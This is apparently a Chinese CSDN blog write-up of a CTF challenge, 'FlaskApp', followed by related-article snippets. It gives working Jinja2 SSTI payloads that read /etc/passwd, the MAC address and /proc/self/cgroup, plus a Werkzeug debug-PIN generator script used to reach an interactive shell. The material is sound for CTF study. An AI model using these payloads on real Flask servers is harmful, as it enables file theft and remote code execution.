Flaskapp(SSTI+Flask PIN)

最新推荐文章于 2023-12-01 23:50:01 发布
最新推荐文章于 2023-12-01 23:50:01 发布
阅读量393 收藏
点赞数
分类专栏: i春秋公益赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43610673/article/details/104726642
版权

题目是一个base64 加密解密的程序。
多次尝试之后发现页面开启了flask的debug模式 ,解码的地方输入1进入debug。
在这里插入图片描述
在debug有源码泄露
在这里插入图片描述
可以看到存在ssti模板注入
文件路径也暴露了
在这里插入图片描述
发现不能命令执行,尝试读取文件

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd', 'r').read() }}{% endif %}{% endfor %}

在页面上先加密再解密
在这里插入图片描述在这里插入图片描述

可以看到用户应该为flaskweb 或者root,由于flag文件路径未知,便尝试获得此debug的pin码从而得到一个python的交互式shell
Mac地址:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address', 'r').read() }}{% endif %}{% endfor %}

在这里插入图片描述
在这里插入图片描述
机器id:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup', 'r').read() }}{% endif %}{% endfor %}

在这里插入图片描述
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同。
对于docker机则读取/proc/self/cgroup:
运行脚本获取pin码(kingkk师傅的exp):

#脚本出处:https://xz.aliyun.com/t/2553  
#by kingkk

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb',# username
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.7/site-packages/flask/app.py' 
]

private_bits = [
    '2485410392829',# address
    'b019a5b5a7b48c37883e766e08a1626ca908e3d4dfdb41c92e6924515ee481d2'# machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

在这里插入图片描述在这里插入图片描述

Arnoldqqq
关注
专栏目录
关于flaskSSTI注入
Kr的博客
01-21 7233
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
最新发布
2401_84009626的博客
04-20 781
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
SSTI-3 常用模块及利用方法
ZQING
08-20 412
SSTI 漏洞的两种利用方式 文件读取(很多适合可配合此法解出 pin 码) RCE 远程代码执行
SSTI学习(Flask)
yaoge1225的博客
07-19 180
SSTI学习(Flask) 本地环境docker vulhub from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') t = Template("Hello " + name) return t.render() if __na
Flask(Jinja2) 服务端模板注入漏洞(SSTI)
weixin_30885111的博客
01-12 326
flask Flask 是一个 web 框架。也就是说 Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 wdb 应用程序可以使一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。 Flask 属于微框架(micro-framework)这一类别,微架构通常是很小的不依赖于外部库的框架。这既有优点也有缺点,优点是框架很轻量,更新时依赖少,并且专注安全方...
Flask入门SSTI
qq_43936524的博客
05-14 1393
flask基本知识 SSTI 靶场通关记录 绕过方式总结
flaskssti:测试SSTI
02-21
烧瓶
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3272
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
08-20
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip 全国大学生信息安全竞赛决赛web...
[GYCTF2020]FlaskApp 1(SSTIPIN
weixin_45577185的博客
10-20 1316
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
Python Flask应用之SSTI初探
qq_38755190的博客
01-28 560
Falsk是什么? Flask是一个轻量级的可定制框架,使用Python语言编写,较其他同类型框架更为灵活、轻便、安全且容易上手。它可以很好地结合MVC模式进行开发,开发人员分工合作,小型团队在短时间内就可以完成功能丰富的中小型网站或Web服务的实现。 Flask最重要的特点。Flask的两个主要核心应用是Werkzeug和模板引擎Jinja。 Flask的安装 我用的是windows系统,在装有python的系统上,直接打开cmd窗口,我们输入一下命令: pip install Flask
Flask框架漏洞:SSTI
glass_york的博客
12-01 1569
SSTI 是 Server-Side Template Injection即 服务端模板注入,它是一种安全漏洞攻击技术。当应用程序在服务器端使用模板引擎来呈现动态生成的内容时,如果用户可以控制模板引擎的输入,就可能导致 SSTI 漏洞。在正常情况下,模板引擎被设计用于安全地将预定义的模板与数据进行组合,生成最终的输出。但是,SSTI 漏洞允许攻击者在应用程序的上下文中执行任意的服务器端代码。当攻击者能够通过用户输入或其他外部来源插入恶意的模板代码时,就会产生一系列问题。
[GYCTF2020]FlaskAppSSTI
qq_45521281的博客
06-09 2989
进入题目: 是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面,思路应该是在加密页面输入payload进行加密,加密结果在解密页面进行解密,输出解密后的payload被渲染到页面输出后执行了payload。 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式,这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,ba
ssti python 沙箱jinja2利用,PIN获取之[GYCTF2020]FlaskApp
qq_58970968的博客
08-20 449
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。对于docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,首先判断是什么类型的ssti,再利用,这里通过报错抛出debug信息的内容判断:爆出的报错部分的代码里面的特殊函数;得到的Mac地址:print(int('去掉“:”后的地址',16))
flask模板注入(ssti),一篇就够了
热门推荐
qq_59950255的博客
03-02 1万+
1.什么是flask? flask是用python编写的一个轻量web开发框架 2.ssti成因 flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入 本地演示(需要自行安装flask,requests模块) 通过输入参数key可以进行简单的渲染,创造新的网页 当我们把render_template 换成render_template_string后,并对参数不进行处理 看看结果 代码执.
SSTI模板注入(flask) 学习总结
Jay17的博客
10-18 1150
SSTI模板注入(flask) 学习总结
Flask Jinja2 SSTI Bypass
桃雾雨Rain的博客
02-19 902
过滤[ 凡是在类中定义__getitem__方法,那么它的实例对象(假定为p),可以像这样p[key]取值,当实例对象做p[key]运算时,会调用类中的方法__getitem__。 ''.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen('dir').read() 关键字过滤(利用request) 利用 ...
[python]浅谈FlaskSSTI漏洞
记录学习,一起进步
04-03 1497
[python]浅谈FlaskSSTI漏洞
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 4197
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
vulhub靶场教程 flask/ssti
12-09
flask/ssti教程中,我们将学习到的是Flask应用程序中的服务器端模板注入(Server-side Template Injection, SSTI)漏洞。这种漏洞的出现是由于Flask应用程序在渲染服务器端模板时没有适当的过滤和限制用户输入的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值